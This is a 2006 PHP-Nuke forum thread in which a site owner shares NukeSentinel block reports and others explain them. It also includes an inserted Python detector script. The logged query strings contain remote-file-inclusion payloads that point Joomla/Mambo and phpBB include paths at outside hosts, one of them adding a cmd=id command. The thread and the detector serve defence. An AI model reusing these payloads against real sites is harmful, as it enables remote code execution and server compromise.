Author |
Message |
death_dream
Hangin' Around

Joined: Aug 10, 2006
Posts: 38
|
Posted:
Mon Aug 14, 2006 3:07 am |
|
It's been two days now since I installed Nuke Sentinel on my site and it's already caught one guy.
This is what the email said:
Code:
Date & Time: 2006-08-13 22:59:25 NDT GMT -0230
Blocked IP: 85.98.82.217
User ID: Guest (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)
Query String: ddream.hostingposts.com/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.turx.nl/components/com_extcalendar/upload/Thehacker?&cmd=id
Get String: ddream.hostingposts.com/index.php?_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.turx.nl/components/com_extcalendar/upload/Thehacker?&cmd=id
Post String: ddream.hostingposts.com/index.php
Forwarded For: none
Client IP: none
Remote Address: 85.98.82.217
Remote Port: 12876
Request Method: GET
|
What was he trying to do?
~Death Dream~ |
|
|
|
 |
montego
Site Admin

Joined: Aug 29, 2004
Posts: 9457
Location: Arizona
|
Posted:
Mon Aug 14, 2006 7:09 am |
|
Don't know for certain as I am not going to try and access his URI he/she tried to use. Doesn't matter right? NS got 'em!!!  |
|
|
 |
evaders99
Former Moderator in Good Standing

Joined: Apr 30, 2004
Posts: 3221
|
Posted:
Mon Aug 14, 2006 9:22 am |
|
It seems to be an attack against Mambo or Joomla systems. Probably a hacking robot script. |
|
|
 |
death_dream

|
Posted:
Mon Aug 14, 2006 9:49 am |
|
montego wrote: | Don't know for certain as I am not going to try and access his URI he/she tried to use. Doesn't matter right? NS got 'em!!! |
Even if you tried the URL you would get banned, right?
~Death Dream~ |
|
|
|
 |
montego

|
Posted:
Mon Aug 14, 2006 7:25 pm |
|
I don't mean trying out the URL on my own site... What I meant was to try and download what this joker is trying to do in the embedded URI. |
|
|
|
 |
death_dream

|
Posted:
Tue Aug 15, 2006 2:32 am |
|
|
|
 |
death_dream

|
Posted:
Tue Aug 15, 2006 6:44 am |
|
Got 2!
Code:
Date & Time: 2006-08-15 08:20:40 NDT GMT -0230
Blocked IP: 86.107.102.26
User ID: Guest (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Query String: ddream.hostingposts.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://geocities.com/nsa_fby/0.txt?
Get String: ddream.hostingposts.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://geocities.com/nsa_fby/0.txt?
Post String: ddream.hostingposts.com/modules/Forums/admin/admin_styles.php
Forwarded For: none
Client IP: none
Remote Address: 86.107.102.26
Remote Port: 2062
Request Method: GET
|
Any idea on this one? |
|
|
|
 |
gregexp
The Mouse Is Extension Of Arm

Joined: Feb 21, 2006
Posts: 1497
Location: In front of a screen....HELP! lol
|
Posted:
Tue Aug 15, 2006 9:19 am |
|
phpBB root path exploit.
Sentinel stops these and it's doing its job. |
_________________ For those who stand shall NEVER fall and those who fall shall RISE once more!! |
|
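A defender-side check for the pattern in both reports above, as an added example that is not part of the original thread and is not NukeSentinel's own code: it parses a blocker e-mail and flags parameters that carry a remote URL or are named after a PHP superglobal. The field layout and parameter names come from the e-mails quoted above; the function names are hypothetical, and the hosts and addresses are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl, unquote

# A value that starts with a URL scheme points an include path at a remote host.
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)
# Parameters named after PHP superglobals, like GLOBALS= and _REQUEST[...] in the first report.
SUPERGLOBAL = re.compile(
    r"^(?:GLOBALS|_(?:REQUEST|GET|POST|COOKIE|SERVER|FILES|ENV|SESSION))(?:\[|$)")

# Constructed samples in the e-mail layout shown above (placeholder hosts and addresses).
REPORT_INCLUDE = """Blocked IP: 192.0.2.10
Reason: Abuse-Filter
Query String: site.example.invalid/index.php?_REQUEST=&_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://files.example.invalid/x.txt?
Request Method: GET"""
REPORT_ENCODED = """Blocked IP: 192.0.2.11
Query String: site.example.invalid/modules/Forums/admin/admin_styles.php?phpbb_root_path=http%253A%252F%252Ffiles.example.invalid%252F0.txt
Request Method: GET"""
REPORT_BENIGN = """Query String: site.example.invalid/modules.php?name=Forums&file=viewtopic&t=12
Request Method: GET"""

def parse_report(text):
    """Turn the 'Field: value' lines of a blocker e-mail into a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(": ")
        if sep:
            fields[key.strip()] = value.strip()
    return fields

def findings(report):
    """Return (parameter, reason) pairs for the report's Query String field."""
    # Everything after the first '?' is the query; a later '?' stays inside a value.
    query = report.get("Query String", "").partition("?")[2]
    out = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if SUPERGLOBAL.match(name):
            out.append((name, "superglobal overwrite"))
        # parse_qsl decodes once; decode again to catch double-encoded values.
        if REMOTE_VALUE.match(unquote(value)):
            out.append((name, "remote URL in parameter"))
    return out

if __name__ == "__main__":
    for sample in (REPORT_INCLUDE, REPORT_ENCODED, REPORT_BENIGN):
        print(findings(parse_report(sample)))
```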
 |
 |
death_dream

|
Posted:
Tue Aug 15, 2006 11:32 am |
|
Excellent. Should I update my phpBB then as well? I'm using 2.0.18
~Death Dream~ |
|
|
|
 |
kguske
Site Admin

Joined: Jun 04, 2004
Posts: 6437
|
Posted:
Tue Aug 15, 2006 3:42 pm |
|
First, put admin authentication on the modules/Forums/admin directory. 2.0.19 is good, but there is some debate about 2.0.20. |
_________________ I search, therefore I exist...
|
|
 |
death_dream

|
Posted:
Wed Aug 16, 2006 2:54 am |
|
K, I will put admin authentication on. But could you tell me how it works before I find myself to the point that I can't log in lol.
Also I put block proxies on strong level, so what does "Default Page" mean?
~Death Dream~ |
|
|
|
 |
montego

|
Posted:
Wed Aug 16, 2006 6:51 am |
|
Quote: |
Also I put block proxies on strong level, so what does "Default Page" mean?
|
It simply means that when the attack is caught, it will display the default blocker page that came with NS... NS allows you to create your own if you would rather not use what is provided. However, I kind of like the "in your face" page that is provided...  |
|
|
|
 |
death_dream

|
Posted:
Wed Aug 16, 2006 7:59 am |
|
I installed PC killer on it.
~Death Dream~ |
|
|
|
 |
montego

|
Posted:
Thu Aug 17, 2006 5:31 am |
|
Well, that is far more "in your face" than the default blocker pages.  |
|
|
|
 |
death_dream

|
Posted:
Thu Aug 17, 2006 6:04 am |
|
montego wrote: | Well, that is far more "in your face" than the default blocker pages. |
That's what I want
~Death Dream~ |
|
|
|
 |
utssace
Worker


Joined: Feb 18, 2006
Posts: 155
Location: Virginia
|
Posted:
Tue Aug 22, 2006 5:16 pm |
|
How do you turn on admin authentication for the forum? I have it turned on for admin access to the site (config.php). |
|
|
|
 |
montego

|
Posted:
Wed Aug 23, 2006 7:05 am |
|
|
|
 |
|